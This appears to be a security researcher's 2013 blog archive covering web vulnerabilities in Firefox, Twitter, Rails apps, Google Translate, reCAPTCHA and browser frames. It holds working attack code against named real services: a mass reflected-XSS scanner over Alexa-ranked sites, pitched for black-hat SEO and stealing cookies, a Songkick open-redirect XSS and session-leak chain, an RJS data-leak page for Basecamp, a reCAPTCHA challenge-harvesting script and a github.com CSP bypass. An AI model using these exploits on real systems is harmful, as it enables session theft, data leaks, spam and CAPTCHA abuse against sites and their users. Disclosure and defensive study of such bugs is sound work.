Monday, December 23, 2013

Regexp Groups "Overflow" in Firefox

TL;DR: In Firefox regexps that capture 999 998+ groups return false, regardless of whether the given string actually matches. It looks like a performance optimization, but in theory it can lead to security issues. I believe it should raise an exception instead of fooling the code.

Unrelated prehistory: a few weeks ago I was trying to XSS the m.facebook.com location.hash validation with a timing attack.
(/^#~?!(?:\/?[\w\.-])+\/?(?:\?|$)/).test(location.hash)&&location.replace(...
I was trying to craft a *long enough* regexp argument so I could get a spare second to replace location.hash just before location.replace happens.
I'm no browser expert and don't comprehend how it works on a low level - it didn't work out anyway, because execution is single-threaded (with setTimeout the timing attack works fine - try to XSS this page).

The side-research is more interesting!


When I was testing FF I noticed that for huge payloads JS simply returns "false". For a string of N repeated characters it still was true, but for N+1 - all of a sudden - false.
Yeah, JS was like saying "TL;DR, hopefully it's false".

Wait, what?! A regexp can't just return a wrong result only because of the argument's length! Let's double-check:

In Chrome

z=Array(999999).join('a');
console.log(/^([\w])+$/.test(z),z.length);
//true 999998

z=Array(999999+1).join('a');
console.log(/^([\w])+$/.test(z),z.length);
//true 999999


In FF

z=Array(999999).join('a');
console.log(/^([\w])+$/.test(z),z.length);
//true 999998

z=Array(999999+1).join('a');
console.log(/^([\w])+$/.test(z),z.length);
//false 999999

Apparently, the thing is, after capturing 999 998 ([\w]) groups FF "gets tired" and returns false instead of finishing the work or raising an exception like Chrome does (RangeError: Maximum call stack size exceeded).

To turn it into an exploitable vulnerability you would need a JS regexp leading to something bad in the "false" case - quite unlikely. But it's a good place to start investigating FF regexp "quirks".

P.S. Please correct me if I did not understand the issue correctly.

Saturday, December 14, 2013

How to send DM on Twitter w/o permission

I just recalled the "SMS commands" feature and tried to send a DM (a private, direct message) with a "Share on Twitter" button. It works!

But you know what's really cool? ANY app can send a DM on behalf of your account by posting "d NAME TEXT" to the API as a regular status update. I just tested it with Twitpic; as you can see, it doesn't require any DM permissions.
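To illustrate the trick (a sketch, not a full client): the request below is an ordinary status update, except the status text starts with the "d" SMS command. authHeader is hypothetical - assume whatever OAuth 1.0a signature the app's library already produces for normal tweets.

// Sketch: a plain "post a tweet" request that actually delivers a DM.
const body = new URLSearchParams({
  status: 'd somefriend this arrives as a direct message' // the "d" SMS command
});

fetch('https://api.twitter.com/1.1/statuses/update.json', {
  method: 'POST',
  headers: {
    'Authorization': authHeader, // hypothetical: signed with plain Read & Write creds
    'Content-Type': 'application/x-www-form-urlencoded'
  },
  body: body.toString()
}).then(r => r.json()).then(console.log);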


Another guy claims he reported it before and Twitter refused to fix it.

Why is it a bug?
1) An app is supposed to have the special "Read, Write and Access direct messages" permission level to access DMs. With this shortcut you can bypass that protection.
2) DMs are easier to use for spam. The user will barely notice it.
3) Also DMs don't show whether they were sent with the official client or a 3rd-party OAuth client, which is great for phishing.

API docs:
[no permission] https://dev.twitter.com/docs/api/1.1/post/direct_messages/new
[warns about permission] https://dev.twitter.com/docs/api/1.1/get/direct_messages/show

Friday, November 29, 2013

RJS leaking vulnerability in multiple Rails applications.

I wrote about this problem in May, without showcases, just a theoretical post http://homakov.blogspot.com/2013/05/do-not-use-rjs-like-techniques.html

It didn't help. Now I want people to take the issue seriously. This is a huge unsolved problem.

Developers have a tool they don't know how to use properly, so they use it however feels convenient. It leads to a security breach. It reminds me of the mass-assignment bug (sorry, I have to mention it every day to feel important).

How does it work?
The attacker redefines the RJS function(s), asks an authorized user to visit a specially crafted page, and leaks data (which the user has access to) along with his authenticity_token. Very similar to how JSONP leaking works.
<script>
  var bcx = {progress: {}};
  var $ = function() {
    return {prepend: function(data) {
      window.data = data
    }}
  };
</script>
<script src="https://basecamp.com/2474985/progress.js"></script>

If the response has any HTML form in it (especially when people use render_to_string), it automatically carries the user's authenticity_token as well.
So RJS leaks 1) the authenticity_token and 2) a lot of private data. Thus the bug is as serious as XSS (it can read responses + craft proper requests). Must be fixed, right?





Some people are +1, some find it "useful in our projects" (= vulnerable), and DHH is against my proposal:
Not only are js.erb templates not deprecated, they are a great way to develop an application with Ajax responses where you can reuse your server-side templates. It's fine to explore ways to make this more secure by default, but the fundamental development style of returning JS as a response is both architecturally sound and an integral part of Rails. So that's not going anywhere.
What's left to do? Demonstrate with full disclosure: Gitlab, Redmine, Diaspora, Spree, Basecamp etc.






And this is only a tiny part of the vulnerable apps we have out there. Let's choose our next actions wisely:
  1. find a way to deny cross-site inclusion of JS templates without breaking the whole technique
  2. remove the whole :js responder as an insecure technique
  3. do nothing about it
Documentation is not an option. I wrote my RJS blog post in May; half a year later nobody cares.

Is my app vulnerable?
If there are any .js.erb files under /app/views, most likely it is. The author of this article can perform a security audit for you, to make sure.

Saturday, November 9, 2013

Use 404, or Lazy Tips for Finding XSS

In my opinion the usefulness of an XSS on a random website is next to nothing. What are you going to do with XSS on your local school website? Stil da kookies?
So you should either look for XSS on a major website or find tons of random XSSes in the hope that some of them turn out to be useful.


https://gist.github.com/homakov/7384127

What is a Lazy technique? Only one GET request is required to check if there's an XSS. Here are the lazy techniques I have in mind:
  1. Developers don't spend much time on 404 pages, so there's a >0% chance the 404 page reflects unescaped input. The script above simply GETs sitename.com/<img src=yolo onerror=alert(0)> and checks if the response body contains the payload. Easy, right?
  2. There are also 5xx errors, try playing with HPP (x[]=1&x[hash]=1) 
  3. Don't forget about 414 error (send super long payload). 
  4. site.com/#<img src=x> for $(location.hash) might work too, but you need to catch the alert execution at runtime.
  5. please share other lazy tricks you know! 

So I took the first 1k of Alexa and apparently 10+ are vulnerable (wikia, rottentomatoes etc). The script is not perfect (if the status code is 404 it doesn't check the body) — feel free to improve it. For the top 1kk the output might be 10k+ vulnerable websites with PR more than 1. PROFITZ.
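For the record, here is a rough Node re-implementation of the same lazy check (a sketch, assuming Node 18+ with global fetch and the Alexa CSV in rank,domain format):

// Lazy 404 XSS check: one GET per site, flag hosts that reflect the payload.
const fs = require('fs');

const payload = '<img src=yolo onerror=alert(0)>';

async function lazyCheck(site) {
  try {
    // fetch percent-encodes the path; some servers reflect it decoded anyway
    const res = await fetch('http://' + site + '/' + payload);
    const text = await res.text();
    if (text.includes(payload)) console.log('[reflects]', res.status, site);
  } catch (e) { /* dead host, TLS error, etc. - skip */ }
}

fs.readFileSync('top-1m.csv', 'utf8')
  .split('\n')
  .map(line => line.split(',')[1]) // "rank,domain"
  .filter(Boolean)
  .slice(0, 1000)                  // the first 1k, like in the post
  .forEach(lazyCheck);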

Here you can take Alexa top 1 000 000 in CSV

And make some money. For (black) SEO purposes you can make the Google bot visit popular-website.com/<a href=//yoursite.com>GOOD</a> etc.
Also send some cheap human traffic to the XSSed pages and dump the page (with tokens in it) + document.cookie to analyse / data mine, hoping to find something useful.

So the recipe is simple: take that 1 million, create a lazy XSS pattern (consider more comprehensive patterns, ?redirect_to=..) then use the XSSed page for SEO / stealing cookies.

A completely hassle-free way to find bugs. Oh, also check out the Sakurity Hustlers - Bug Hunters Top.

Wednesday, November 6, 2013

Stealing user session with open-redirect bug in Rails

Is open redirect bad for your website?
If we don't take "phishing" into account, how can an open redirect be dangerous?
Mind reading http://homakov.blogspot.com/2013/03/redirecturi-is-achilles-heel-of-oauth.html, because any redirect to a 3rd-party website will leak the facebook access_tokens of your users.
So an innocent open redirect on logout will simply reveal the access_token of the current user when we set redirect_uri to Client/logout?to=3rdparty.
That's really bad. Users won't be happy to see your client posting spam on behalf of their accounts. 

What about open redirect in Rails?
As I previously mentioned in my blog posts, Rails loves playing with arguments. You can send :back, or "location" or :location => "location" or ->{some proc} or :protocol=>"https", :host=>"google.com" etc. So because of this line
redirect_to params[:to]
an attacker has multiple ways to compromise the redirect.

1. params[:to][0] == '/' is not good protection, since //google.com is a legit URL. (By the way if you use regexp avoid $^, luke)
2. XSS by sending ?to[protocol]=javascript:payload()//&to[status]=200
3. Discovered yesterday: we can see plain HTTP headers in the response body by sending ?to[status]=1

Live demo on Songkick

Step 1, open with GET or POST params
https://www.songkick.com/session/new?success_url[protocol]=javascript&success_url[host]=%250Alocation=name//&success_url[status]=200

Step 2, the user clicks the XSS link and executes the payload from the window name

Step 3, the payload parses the broken HTTP response and leaks the httpOnly session cookie
https://www.songkick.com/session/new?success_url[status]=1

Frankly, this bug is really common. I found it in more than 5 popular Rails startups, though I've only started checking.
If you need a careful security audit (or a brutal pentest) of your app, visit http://www.sakurity.com/

Saturday, July 27, 2013

Google Translate hack explained

I wrote an article today and it sucked.

Here on HN I was told a couple of times that:
1) PoC doesn't work
2) nothing is clear

Sorry, everyone. I really didn't notice that "Safe Mode" issue locally.
How can I fix this?
1) I crafted a groundbreaking awesome PoC using a new technique, and it works in Chrome and FF for logged-in / logged-out users like a charm.
2) I will explain how it works thoroughly.

Kremlin.ru announces Russia is Mango Federation!

Vulnerability
From time to time we need to translate news / articles from foreign trustworthy websites, official news feeds etc. Can we break into the GT (Google Translate) system and modify its output for a prank or something worse? Yes, because GT loads all untrusted "user content" from the GUC domain (googleusercontent.com). Thus GUC guc2.html can modify the content of GUC kremlin, thanks to SOP (same origin policy).

But there were many interesting "pitfalls" I had to solve on my way to this awesome PoC:

  1. By default Google applies "Safe Mode" to GUC pages: sandbox=allow-scripts allow-forms allow-same-origin. This means GUC pages cannot open new windows. So I used the "opener" trick: I opened guc2.html?i in a new window and replaced the current one with GT kremlin. Now there is a bridge between GUC guc2.html and GUC kremlin via parent.parent.opener.frames[0]
  2. GUC guc2.html cannot close GT guc2.html because this action is also restricted by the sandbox attribute. That's why I framed GT guc2.html under guc2.html?i (I really don't know why GT doesn't send X-Frame-Options; it helped me a lot)
  3. I need at least one click to open guc2.html?i, otherwise the popup will be blocked. When you hover over the link above you see an innocent Google Translate path; in the background, the onclick event opens one more window (guc2.html?i).
  4. guc2.html?i creates an iframe (opacity=0!) with GT guc2.html and waits for an "onmessage" event to close itself.
  5. As soon as GUC guc2.html is loaded it starts a setInterval trying to modify GUC kremlin using this elegant chain: parent.parent.opener.frames[0]. When the modifications are done it invokes parent.parent.postMessage('close','*') to let guc2.html?i know that business is done.
  6. The second window closes in 1-2 seconds; the first window has GT kremlin with modified content. Enjoy reading Mango news.
Please, dig this JS and ask questions. My duty is to answer them all.
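For readers who prefer code, here is a condensed sketch of that flow (the URLs are placeholders, not the real PoC):

// --- the link's onclick handler (needs the user's single click): ---
function onClickLink() {
  window.open('guc2.html?i');     // helper window
  top.location = GT_KREMLIN_URL;  // placeholder: the GT-translated kremlin page
}

// --- guc2.html?i: frames GT guc2.html invisibly and closes itself on signal ---
// <iframe style="opacity:0" src="...GT guc2.html..."></iframe>
window.onmessage = function (e) {
  if (e.data === 'close') window.close();
};

// --- GUC guc2.html (inside the helper's iframe, via the GT wrapper page): ---
var timer = setInterval(function () {
  try {
    // the bridge from pitfall #1: same GUC origin, reachable via the opener
    var kremlin = parent.parent.opener.frames[0];
    kremlin.document.body.innerHTML = kremlin.document.body.innerHTML
      .replace(/Russian Federation/g, 'Mango Federation');
    parent.parent.postMessage('close', '*'); // pitfall #5: business is done
    clearInterval(timer);
  } catch (err) { /* the kremlin frame is not loaded yet, retry */ }
}, 500);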

Sunday, July 21, 2013

Core flaw of Cookies.

It's ignorance of Origin.

I've ranted about cookies before, but now I've realized the most general flaw of cookies: they ignore Origins.
Origin = Protocol (the way you talk to server, e.g. http/https) + Domain (server name) + Port. It looks like http://example.org:3000 or https://www.example.org

Obviously, cookies are the only adequate way to authenticate users.
Why is localStorage not suitable for authentication? It's accessible on the client side, so authentication data can be leaked, and it's not sent to the server automatically - you have to pass it manually with a header/parameter.

Origins made web interactions secure and concise:
localStorage from http://example.com can't be read on http://example.com:3000
DOM data of http://example.com can't be accessed on http://example.com:3000
XMLHttpRequest cannot load http://lh.com:4567/. Origin http://lh.com:3000 is not allowed by Access-Control-Allow-Origin
and so on... But here comes cookie design!

Cookies got 99 problems, and XSS is one.
1) In fact "most of the time most of the people" don't need access to cookies from the client side. The 'httpOnly;' flag was created to restrict javascript access to a cookie value (such a confusing name, isn't it? Only for http:, or what?). Also, who has ever actually needed the 'path=' option? One more layer of confusion.

2) "protocol" and Cookie Forcing problem.
People were aware of MITM and restricted sending "https" cookies to "http" - great!
They didn't restrict sending "http" cookies to "https" - oh shi~. Cookie forcing easily leads to cookie tossing, and cookie tossing leads to owning the user pretty easily as well.

Tip: Store csrf_token inside of the session cookie (literally) and refresh it after login.

3) The "port" thing.
This is not a solved problem yet. If someone owns a ToDo app at https://site.com:4567 he will get all the cookies for https://site.com with every request. Yes, even "httpOnly;" ones. Yes, "Secure;" too. Cookies just don't care about ports.

How can we fix cookies?
1) Don't let ports share cookies - make browsers "think" that the port is part of the domain name.
2) Origin field. Set-Cookie: sid=123qwe; Origin=https://site.com:4567/; will mean "Secure;", "Port=4567" and "Domain=site.com" at the same time.

Conclusion.
During the last decade many workarounds were introduced just to make cookies saner, yet the straightforward Origin approach was never implemented. Are we doomed to maintain this forever...?

Tip: don't run unreliable apps on a different port of the same domain, because cookies will ignore the port. Check your localhost, developer!

Thursday, July 4, 2013

XSS Defense in Depth (with Rack/Rails demo)

Quick introduction to the XSS problem
XSS is not only about scripts. Overall it happens when an attacker can break the expected DOM structure with new attributes/nodes. For example, <a data-remote=true data-method=delete href=/delete_account>CLICK</a> is a script-less XSS (in Rails, jquery_ujs will turn the click into a DELETE request).
It can happen either on page load (normal XSS) or at runtime (DOM XSS). Once a payload is successfully injected there is no safe place from it on the whole origin: any CSRF token is readable, any page content on site.com/* is accessible.

XSS is often found on static pages, in *.swf files, *.pdf Adobe bugs and so on. It happens, and there is no guarantee you'll never have it.

You can reduce the damage
Assuming there is a GET+POST /update_password endpoint, wouldn't it be a good idea to deny all POST /update_password requests coming from pages other than GET /update_password?

Awesome! But no: because of many browser problems, Pagebox is a technique for the next generation of websites.

Thankfully a similar technique can be implemented with subdomains:
www.site.com (all common functions, static pages)
login.site.com (it must be a different subdomain, because XSS can steal passwords)
settings.site.com
creditcards.site.com
etc

The app serves specific (secure) routes only from dedicated domain zones, which have different CSRF tokens. All subdomains share the same session and run the same application; the upgrade is really seamless, the user will not notice anything, redirects are automatic.

How to add it to a Rack/Rails app

You only need to modify config.ru (I monkeypatched a Rails method; it's easy to do the same for a Sinatra app).

It fails if you GET/POST www.site.com/secure_page from a www page, because the middleware redirects to secure.site.com (which has a different origin - you cannot read the response).
It fails if you POST to secure.site.com/secure_page with the www page's CSRF token, because the secure subdomain uses a different CSRF token which www doesn't know.
Neat!

The demo is a basic prototype and may contain bugs; here you can download the code.

There is also a subdomainbox gem. I hope to see more Domain Box gems for Ruby apps, along with libraries for PHP/Python apps. Maybe we should add this to Rails core, showing other programmers who cares about security the most?

[PUNCHLINE] Is it you? We're looking forward to hearing from you. Sakurity provides penetration tests, source code audit and vulnerability assessment.

Thursday, June 20, 2013

Cookie Forcing protection made easy

I wrote a post about the CSRF tool and readers noticed an intentional mistake in it — storing a token in a plain cookie can be exploited with cookie forcing (like the cookie tossing we saw on GitHub, but it works everywhere). TL;DR: with MITM an attacker can replace or expire any cookie (write-only access).

Actually I don't think it's a mistake in the CSRF protection design; I still think the problem is the horrible cookie design. But we've got to deal with the current situation, and taking this behavior into account I came up with a concise and effective protection.

At first glance it might look ugly. But the web is ugly, so it's OK.

Step 1. We simply put the csrf_token value into the session. Wait, we do not store it in the database, because that's pointless. We do not store it in a signed cookie either, like Rails does (that's also overwork).
I propose to literally store the csrf_token in the session cookie:
sid=123qweMySeSsIon--321csRFtoKeN
You only need a middleware on top of the stack that slices off the token after the --.
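For illustration, here is the same idea sketched in Node/Express terms (the post targets Rack; the cookie name sid and the -- separator are taken from the example above):

// Slice "sid=123qweMySeSsIon--321csRFtoKeN" into session id + csrf token.
const express = require('express');
const cookieParser = require('cookie-parser');

const app = express();
app.use(cookieParser());
app.use((req, res, next) => {
  const raw = req.cookies.sid || '';
  const i = raw.lastIndexOf('--');
  req.sessionId = i === -1 ? raw : raw.slice(0, i);
  req.csrfToken = i === -1 ? null : raw.slice(i + 2);
  next();
});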

Step 2. An attacker can still fixate the whole session cookie value (sid + csrf token). So always refresh the csrf_token after login to make sure it wasn't fixated.

Can you think of anything simpler than this trick? I guess anything using two separate cookies will require signatures and cryptography with a server secret. Too much work for a design mistake W3C made.

Although CSRF protection on its own is not popular, cookie forcing protection is way less popular — don't be surprised how many websites/frameworks are vulnerable. How to check: a site is vulnerable if you can replace the csrf_token cookie (use Edit This Cookie) without breaking the session, or if the csrf_token remains the same after login.

For example, the Django framework (the csrftoken cookie is not integrated with the session), Twitter (doesn't refresh authenticity_token after login, so it can be fixated), etc.

Google Reader is dead, make sure to follow me on another website.

Thursday, June 13, 2013

Camjacking: Click and say Cheese

on reddit/HN
This post is based on an interesting trick by @typicalrabbit.

UPD: This has been known since 2011, but not fixed yet. Why?! I made a PoC to demonstrate the severity.

TL;DR: this works precisely like regular clickjacking - you click on a transparent Flash object and it allows access to the camera/audio channel. Voila, the attacker sees and hears you.

This is not a stable exploit (tested on Mac with Chrome; I do use Mac and Chrome, so it's a big deal anyway).

Your photo can be saved on our servers but we don't do this in the PoC. (Well, we had an idea to charge $1 for deleting a photo but it would not be fun for you). Donations are welcome though.

Proof of Concept (not safe for work a bit)

Wait a minute! Hire us for security stuff.

Sunday, May 19, 2013

The reCAPTCHA Problem

TL;DR Nope, I didn't find a major breach, just an interesting detail in reCAPTCHA's design.

CAPTCHA ain't no good for CSRF
I was told on Twitter that CAPTCHA mitigates CSRF (and, wow, it is "officially" in the OWASP Challenge-Response section). Here is my opinion — it does not, it will not, it should not. Feel free to wipe that section from the document.

CAPTCHA in a nutshell
http://en.wikipedia.org/wiki/CAPTCHA
"challenge" is literally a key to solution (not necessary random, solution can be encrypted inside - state less).
"response" is an attempt to recognize the given image.
Client is a website that hates automated actions, e.g. registrations.
Provider generates new challenges and verifies attempts.
User — a human being or a bot promoting viagra online no prescription las vegas. Nobody knows exactly until User solves the CAPTCHA.

Ideal flow
1. User comes to Client.
2. Client securely gets a new challenge from Provider.
3. Client sends back to User the challenge value with corresponding image.
4. User submits the form along with challenge and response. Client verifies them by sending over to Provider.
5. If Provider responds successfully — User is likely a pink human, otherwise:
if amount_of_attempts > 3
  BAN FOR A WHILE
else
  GOTO 2
end

As you can see User talks directly to Client. He has no idea about Provider.
Only 1 challenge per form attempt is allowed. 3 fails in a row = BAN. No matter how hard the challenges are, User must try to solve them.


reCAPTCHA is easy to install, free, secure and very popular.


The reCAPTCHA flow
1. Client obtains public key and private key at https://developers.google.com/recaptcha/intro
2. Client adds some JS containing his public key to the HTML form.
3. User opens the page, User's browser makes a request to Provider and gets a new challenge.
4. User solves it and sends challenge with response to Client
5. Client verifies it by calling Provider's API (CSRF Tool template). In case of a failed attempt User is required to reload the Provider's iframe to get a new challenge - GOTO 3.

The reCAPTCHA problem
Client knows how many wrong attempts you made (because verification is server-side) but doesn't know how many challenges you actually received (because User gets the challenge via JS; Client isn't involved). Getting a challenge and verifying a response are loosely coupled events.

Let's assume I have a script which recognizes 1 of 1000 reCAPTCHA images. That's quite a shitty script, right?

Wait, I have another script which loads http://www.google.com/recaptcha/api/noscript?k=VICTIM_PUBLIC_KEY (demo link) and parses out src="image?c=CHALLENGE_HERE"></center

For 100 000 images the script solves (more or less reliably) 100 of them and crafts valid requests to Client by putting the solved challenge/response pairs in them.
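A sketch of that harvesting step (assuming Node 18+ fetch; the regex targets the src="image?c=..." attribute mentioned above):

// Pull a fresh challenge straight from the Provider - the Client never sees it.
async function getChallenge(publicKey) {
  const res = await fetch(
    'http://www.google.com/recaptcha/api/noscript?k=' + publicKey
  );
  const html = await res.text();
  const m = html.match(/src="image\?c=([^"]+)"/);
  return m && m[1]; // the challenge; solve at leisure, submit only the easy ones
}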

Analogy: User = Student, Client = Exam, Provider = Table with questions.
To pass, the Student has to solve at least 1 problem, and he has only 3 attempts. In the reCAPTCHA world the Student goes to the table and looks over all the questions on it, trying to find the easiest one.

You don't need to solve reCAPTCHAs as soon as you receive them anymore. You don't need to hit Client at all to get challenges. You talk directly to Provider, get some reCAPTCHAs with Client's PUBLIC_KEY, solve the easiest and have fun with different vectors.

There are blackhat APIs like antigate_com which are quite good at solving CAPTCHAs (private scripts and chinese kids, I guess).
With this trick they could create a special API for reCAPTCHA: you send the victim's PUBLIC_KEY and get back N solved CAPTCHAs which you can use in malicious requests.

Mitigation
I cannot say whether it should be fixed, but website owners must be aware that challenges are out of their control. To fix this, reCAPTCHA could return the number of challenges issued and failed attempts along with the verification response.

Questions? I realized this an hour ago so I can possibly be mistaken somewhere, or I didn't discover it first. Point it out please.

Saturday, May 18, 2013

CSRF Tool

I facepalm when I hear about CSRF in popular websites. (I was searching for them in the past but then realized that's a boring waste of time.)

A while ago our friend Nir published a CSRF changing the Facebook password, and it was the last straw. I can recall at least 5 major CSRF vulnerabilities in Facebook published in the last 6 months. This level of web security is unacceptable nonsense for Facebook.

So, here is a short reminder about mitigation: 
Every state-changing (POST) request must contain a random token. The server side must check it before processing the request, against the value stored in the received cookies: cookies[:token] == params[:token]. If any POST endpoint lacks it — something is clearly wrong with the implementation.
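In Node/Express terms that check could look like this (a sketch; and as the cookie forcing post above explains, a token in a plain cookie can be overwritten by a MITM, hence the session-cookie trick):

// Sketch: double-submit check - the POSTed token must equal the cookie token.
const express = require('express');
const cookieParser = require('cookie-parser');

const app = express();
app.use(cookieParser());
app.use(express.urlencoded({ extended: false }));

app.use((req, res, next) => {
  if (req.method === 'POST' &&
      (!req.cookies.token || req.cookies.token !== req.body.token)) {
    return res.status(403).send('CSRF token mismatch');
  }
  next();
});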

To make the world a better place I created a simple and handy CSRF Tool: homakov.github.io


  1. Copy as cURL from the Web Inspector, paste it into the text field and get a working template in a few clicks.
  2. No hassle. Researchers need a playground to demonstrate CSRF; with CSRF Tool you can simply share a link with a working template.
  3. No disclosure. The fragment (the part after #) is not sent to the server, so I am not able to track the CSRFs you are currently researching (GitHub Pages has no server side anyway). The link to a template contains all the information inside.
  4. Auto-submit for more fun; Base64 makes the URL longer but hides the template.
  5. Add new fields and modify existing ones, change the request method and endpoint path seamlessly.
  6. Post into an iframe (which is carefully sandboxed) or a new window, try referrer-free submission and so on.
You got a cross site request forgery tool
tell me whatcha gonna do???




Everything is free but donations are welcome :) PayPal: homakov@gmail.com

Tuesday, May 14, 2013

Two Factor Authentication? Try OAuth!


UPD: no wonder - I missed the fact that OAuth providers use static passwords, so it cannot be a legit 2nd factor; it just makes the 1st factor harder to exploit. Thanks for the feedback, people from reddit!


Disclaimer: I'm a noob in Two Factor Authentication (TFA). I got an idea today which I want to share to get feedback; your comments are totally welcome.

I don't have a mobile phone. Not only because Russian mobile providers are cheaters (likely the same in your country), but also for many other reasons: traveling (my MasterCard was blocked once in Sofia and I needed an SMS approval code, which I couldn't receive — my mobile was "outside the coverage area" all the time), no daily usage (I've never needed to call someone ASAP in real life; maybe I am such a nerd), VoIP FTW, etc. — who cares, this is not my point.



The thing is, all physical items (mobile phones, yubikeys, token generators, eye biometrics, fingerprints) are cloneable / stealable, or just not reliable enough (face/gesture/speech recognition).

Again, as I said in the disclaimer, I don't know if scientists have already created a universal, reliable physical object for TFA; I just read the wiki article a bit and it seems they have not.

Why must the Second Factor be a real object in our digital century? Is it really any better/safer (it's clearly less convenient) than yet another password or the bunch of cookies our browsers store? I doubt it.

In browser we trust.

OAuth is not supposed to authenticate you - no surprise here. But an OAuth (or OpenID) provider can be a trusted 3rd party which approves the action you are about to commit.

Trusted 3rd Party Website
  1. Every normal Internet user has, or can immediately register, a Facebook/Twitter/Paypal/Google account with no "physical" hassle attached.
  2. An attack surface is added, but attack complexity increases dramatically.
    example.com surface + twitter surface + facebook surface = a hacker needs an XSS or similar bug in two major social networks plus your example.com password to log in to your example.com account.
    Not enough? Add Paypal Connect. Add a force-login option so the attacker will need all of your passwords.

    The more guys say John is a reliable person I can trust, the more I believe he really is. And I don't need to look at John's tattoo (a poor analogy for biometrics) which he hates to show!
  3. Hassle-free. Just stay logged in to FB/Twitter all the time, and a couple of quick OAuth redirects in iframes (no interaction required at all) will make sure that your current FB account is the one attached to your example.com account, and that your current Twitter user equals the attached one.
    It can be simplified and made more secure, because you only need the /me endpoint data; the actual access_token will not be used.
Leaving the post short on purpose; waiting for your ideas - perhaps I missed something huge. Thanks!


Saturday, May 4, 2013

Do not use RJS-like techniques

RJS (Ruby JavaScript) — a straightforward technique where the server side (e.g. a Rails app) responds with Javascript code and the client side evals it (writing JS in Ruby is unrelated; I only consider the response-evaling concept!)

Here are my usability and security concerns about this interaction.

Other developers possibly use their own RJS-like techniques — they may find my post helpful too.
  1. Broken concept & architecture. This feels as weird as the client side sending code that is going to be evaled on the server side... wait... Rails programmers had a similar thing for a while :/
    Any RCEJS technique can be painlessly split into client's listeners and server's data.
  2. Escaping user content and putting it into Javascript can be more painful and have more pitfalls than normal HTML escaping. Even the :javascript section used to be vulnerable in HAML (</script> breaks .to_json in Rails < 4). There are more special characters and XSS vectors you should care about.
  3. JSONP-like data leaking. If the app accepts a GET request and responds with Javascript containing private data, an attacker can use fake JS functions to leak data from the response. For example, the response is:

    Page.updateData("data")

    and attacker crafts such page:

    <script>var Page={updateData:function(leak){ ... }}</script>
    <script src="http://TARGET/get_data.js?params"></script>

    Voila, joys of RJS
  4. UPD: as pointed out on HN, evaling the response will mess with your global namespace, and there is no way to jump back into the closure you created the request in.
Original RJS (Ruby-generates-JS) was removed by Yehuda Katz 6 years ago; he gave me this link with more details.

But I still see apps in the wild responding with private data in javascript. This is a very fragile technique; refactoring will improve both the code quality and the security of your app.

P.S. Cool, GH uses cutting edge HTML 5 security and added CSP headers. My thoughts:

  • Rails 4 has built-in default_headers (guess who added it?), which performs better than a before filter
  • the current CSP is easily bypassed with the JSONP trick; just type this in the console on github.com:
    document.write('<script src="https://github.com/rails.json?callback=alert(0)//"></script>')
    I will fix it when I get spare time, btw: https://github.com/rails/rails/pull/9075
  • CSP is very far from ultimate XSS prevention. Really very far, especially for Rails's agileness and jquery_ujs. Github should consider privileged subdomains https://github.com/populr/subdomainbox 

Saturday, April 20, 2013

How frames can mess with parent's namespace

This post describes pitfalls of cross-frame navigation. It started to "feel wrong" from the very beginning, and yesterday I noticed another quite interesting behaviour.

First of all, look closely at the 'frames' property. Did you know that...


window == frames
true
self == frames
true
frames and window are the same variable — WindowProxy object. 
You probably know that any frame is accessible in the parent via its window.name:
<iframe name="some_frame" src=...> creates a some_frame variable pointing to another WindowProxy object.

The tricky part is that a frame can redefine its own window.name, and it will inject a new variable into the parent's namespace (only if that variable is undefined — you cannot shadow existing variables...)

Let me remind you of the "script killer" trick (we used to kill framebreakers with it). The XSS Auditor by default removes pieces of scripts that look "malicious": if you want to cut off <script src="/lib.js"></script>, just pass that code in the query string.

Rough example:
1. a page on (frameable) site.com has some innocent iframe (e.g. a facebook Like button).
2. also it does some actions when JS variable 'approved' is true-ish:
<script>var approved = false</script>
after page load or click ...
<script>if(approved){actions!}else{alert('not approved yet');}
3. evil.com opens <iframe name="target" src="http://site.com/page?slice=%3Cscript%3Evar%20approved%20%3D%20false%3C%2Fscript%3E"> - this kills the approved variable (the Auditor strips the matching script).
4. Now it navigates the facebook button frame (because of Frame Navigation madness): target[0].location='http://evil.com/constructor' (target is a WindowProxy, and [0] is its first frame - the fb Like).
5. constructor changes frame's window.name = 'approved'
6. now there is an "approved" variable in the namespace of site.com (a truthy WindowProxy), and if(approved) passes - actions! (See the sketch below.)
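Putting steps 3-6 together, the evil.com side might look roughly like this (a sketch; the names and timeouts are illustrative):

// --- evil.com page ---
// step 3: the "script killer" query makes the Auditor strip the
// <script>var approved = false</script> declaration on site.com
var killer = 'http://site.com/page?slice=' +
  encodeURIComponent('<script>var approved = false<\/script>');
document.write('<iframe name="target" src="' + killer + '"></iframe>');

// step 4: navigate the innocent inner frame (the fb like) to our constructor page
setTimeout(function () {
  window.target[0].location = 'http://evil.com/constructor';
}, 3000);

// --- http://evil.com/constructor ---
// step 5: renaming ourselves injects `approved` (a truthy WindowProxy)
// into site.com's namespace, since the original variable was killed
window.name = 'approved';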

Also:
1. approved+'' returns "[object Window]" (I didn't find a way to redefine toString). It would be much more dangerous if we could play with the stringified value.
2. it can be any complex nested variable (/constructor just builds a page of nested frames with specific window.names), e.g. config.user.names[0] - we can replace this variable (by creating a "names" iframe under a "user" iframe which is under a "config" iframe)! With [object Window], but anyway ;)
3. you can use this playground from previous post

Such tricks are reminders of how ridiculous web standards can be (URL disclosure is my favorite WontFix).


Friday, April 5, 2013

HTML5 Sandbox - a bad idea

About sandbox.

I don't like either the idea or the implementations of the Sandbox feature (part of so-called HTML5). Most articles about it are lame copy-pastes of the spec. The straight question WHY DO WE NEED IT AT ALL remains unanswered. Furthermore, nobody writes that the implementation is a little bit crazy — by fixing small vulnerabilities it introduces huge ones.

Why?

When we embed frames with external content we are still open to navigational and/or phishing attacks (obviously cookies/inner HTML cannot be stolen, because of the same origin policy). The iframe code can change top.location or open a phishing popup window with prompt('your password?')... and that's it. That's all we needed to fix.

Besides the allow-popups and allow-top-navigation options, W3C introduced allow-scripts, allow-forms and allow-same-origin. They wanted the best - you know the rest.

Javascript... malicious shit.

OMG, sandbox can load any page with javascript turned off.

People are still fixing CSS for IE6. Meanwhile W3C destroys all Javascript-based framebreakers without asking anyone's advice (only one anti-clickjacking solution is left - X-Frame-Options). Nobody gave a shit about compatibility, I guess.

W3C needed a really good reason to introduce such a crazy feature: "Javascript from a frame can do malicious actions, now you can turn it off".
Malicious what? Tomorrow they will call Javascript a Remote Code Execution Vulnerability and ask us to remove the browser? Javascript cannot be malicious on its own!

allow-forms + disallowed scripts = clickjacking working like a charm against javascript-based framebreakers. Surely, not everyone uses X-Frame-Options yet, e.g. vk.com. UPD: here is a talk from BlackHat 2011 - for the last 2 years it has been WontFix :O

